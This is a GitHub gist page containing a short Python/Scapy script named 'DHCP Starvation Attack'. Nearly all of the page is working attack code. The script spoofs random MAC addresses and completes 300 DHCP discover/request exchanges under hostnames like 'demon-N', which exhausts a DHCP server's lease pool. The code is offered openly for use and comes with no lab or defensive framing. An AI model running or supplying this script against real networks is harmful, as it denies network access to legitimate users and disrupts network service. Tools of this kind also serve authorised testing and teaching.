Skip to content

Instantly share code, notes, and snippets.

@jeremy-rifkin

jeremy-rifkin/dhcp_starvation.py

Created April 25, 2020 01:47
Show Gist options
  • Save jeremy-rifkin/4e8dd8fb043a0837b8f2f400c9551531 to your computer and use it in GitHub Desktop.
Save jeremy-rifkin/4e8dd8fb043a0837b8f2f400c9551531 to your computer and use it in GitHub Desktop.
Download ZIP
DHCP Starvation Attack (Python/Scapy)
Raw
dhcp_starvation.py
#!/bin/python3
from scapy.all import *
import binascii
conf.checkIPaddr=False
display = False
def run_dhcp_transaction(requestMAC, hostname, interface="eth0"):
localmac = get_if_hwaddr(interface)
localmacraw = binascii.unhexlify(localmac.replace(":", ""))
requestmacraw = binascii.unhexlify(requestMAC.replace(":", ""))
# DHCP discover
dhcp_discover = Ether(src=localmac, dst="ff:ff:ff:ff:ff:ff") \
/ IP(src="0.0.0.0", dst="255.255.255.255") \
/ UDP(dport=67, sport=68) \
/ BOOTP(chaddr=requestmacraw, xid=RandInt()) \
/ DHCP(options=[("message-type", "discover"), "end"])
if display: print(dhcp_discover.display())
dhcp_offer = srp1(dhcp_discover, iface=interface)
if display: print(dhcp_offer.display())
# DHCP request
ip = dhcp_offer[BOOTP].yiaddr
server_ip = dhcp_offer[BOOTP].siaddr
xid = dhcp_offer[BOOTP].xid
dhcp_request = Ether(src=localmac, dst="ff:ff:ff:ff:ff:ff") \
/ IP(src="0.0.0.0", dst="255.255.255.255") \
/ UDP(sport=68, dport=67) \
/ BOOTP(chaddr=requestmacraw, xid=xid) \
/ DHCP(options=[("message-type", "request"), ("requested_addr", ip), ("server_id", server_ip), ("hostname", hostname), "end"])
if display: print(dhcp_request.display())
dhcp_ack = srp1(dhcp_request, iface=interface)
if display: print(dhcp_ack.display())
def main():
for i in range(300):
run_dhcp_transaction(RandMAC(), "demon-{}".format(i))
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment